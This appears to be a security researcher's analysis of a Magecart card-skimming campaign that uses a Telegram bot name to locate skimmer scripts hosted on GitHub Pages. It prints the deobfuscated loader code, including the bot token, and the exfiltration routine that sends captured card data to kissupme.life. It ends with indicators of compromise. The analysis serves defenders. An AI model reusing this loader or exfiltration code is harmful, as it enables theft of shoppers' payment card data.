Malware Persistence via Telegram and GitHub

Attackers are devising ingenious methods to prolong their skimming activities, aiming for sustained persistence.

The usual tactics, techniques, and procedures (TTP) include the creation of disposable domains to house malware and facilitate the extraction of credit card information.

However, these throwaway domains are susceptible to takedowns and often become swiftly identified by malware researchers.

A novel variant of the Magecart threat has surfaced, aiming to circumvent these challenges.

Telegram Loader

The loader is first hidden behind obfuscation. However, once this obfuscation is removed, it becomes evident what is taking place:

fetch(
  "https://api.telegram.org/bot6167771222:AAFLu6qy3CVPwosDZKlnuk0tLI-WBxq0RCk/getMe"
)
  .then((resp) => resp.json())
  .then((resp) => {
    const [username, path] = resp.result.first_name.split(",");
    const script = document.createElement("script");
    script.src =
      "https://" + username + ".github.io/" + path + ".js?r=" + Math.random();
    try {
      document.body.appendChild(script);
    } catch (e) {
      document.head.appendChild(script);
    }
  });

1. Initially, a request is sent to the Telegram bot API to fetch specific information about a designated bot: https://api.telegram.org/bot6167771222:AAFLu6qy3CVPwosDZKlnuk0tLI-WBxq0RCk/getMe.
2. The "first name" of the bot is then divided using a comma as the separator.
3. The first part contains the GitHub username.
4. The subsequent part indicates the file path intended for loading.
5. Afterward, a script is attached to the webpage found at https://<username>.github.io/<path>.js.

This approach eliminates the need for the attacker to utilize a disposable domain or set up infrastructure for hosting malicious scripts. This is due to the fact that the scripts are directly loaded from GitHub.

Furthermore, even if GitHub takes action to deactivate this account, the individual could easily create a new account and update the Telegram bot's name accordingly.

GitHub Hosted Multi-Skimmer

The current response from the Telegram API takes the form of the following JSON structure:

{
  "ok": true,
  "result": {
    "id": 6167771222,
    "is_bot": true,
    "first_name": "jubilmaria,homepage/swco",
    "username": "asddq4t44w3f45y45refbot",
    "can_join_groups": true,
    "can_read_all_group_messages": false,
    "supports_inline_queries": false
  }
}

This dataset allows us to deduce the following insights:

• The GitHub account corresponds to jubilmaria.
• The repository in question is labeled as homepage.
• The specific script designated for loading is identified as swco.js.

While this repository outwardly presents itself as a legitimate entity:

The contents concealed within are, in reality, malicious and are exposed through GitHub Pages.

The loaded script, swco.js, is composed of four distinct skimmers, each finely tuned to specific targets. swco.js performs checks on window.location.host and window.location.href against a roster of compromised stores, subsequently selecting from three skimmer variations:

1. Authorizenet (Magento 2)
2. Klarna Checkout
3. Authorizenet (WooCommerce)

In cases where the current window location lacks a precise store match, the script defaults to a more generalized skimmer designed to exploit both Magento and WooCommerce platforms.

Across all versions, users are confronted with a counterfeit credit card form. The data inputted into these forms is then transferred to https://kissupme.life/a:

fetch("https://kissupme.life/a", {
  headers: {
    Accept: "application/json",
    "Content-Type": "application/json",
  },
  body: JSON.stringify(_0x1e3c4c),
  method: "POST",
})
  .then((_0x4900b6) => {
    setTimeout(() => {
      alert("Waiting time exceeded");
      window.location.reload();
    }, 2500);
  })
  .catch((_0x112e4a) => {
    new Image().src =
      "https://kissupme.life/a?data=" +
      encodeURIComponent(JSON.stringify(_0x1e3c4c));
    setTimeout(() => {
      alert("Waiting time exceeded");
      window.location.reload();
    }, 2500);
  });

Initially, an attempt is made to initiate a POST request for data exfiltration. Should this prove unsuccessful, an alternative method involving a fake Image is employed as an exfiltration mechanism.

Once 2.5 seconds have transpired, an alert is presented to the user, accompanied by a page refresh. Following this reload, the user is presented with the authentic credit card form.

At present, the domain resolves to 51.161.204.249, a dedicated server registered with Regxa, Ltd.

Indicators of compromise

• jubilmaria
• kissupme.life
• 51.161.204.249
• bot6167771222
• asddq4t44w3f45y45refbot

Read more

• Persistent Magento backdoor hidden in XML
• Sansec joins forces with Google's VirusTotal
• Sansec and Europol counter online skimming
• Magento wish list exploit bypasses WAF protection
• Is your store’s newsletter being used for phishing?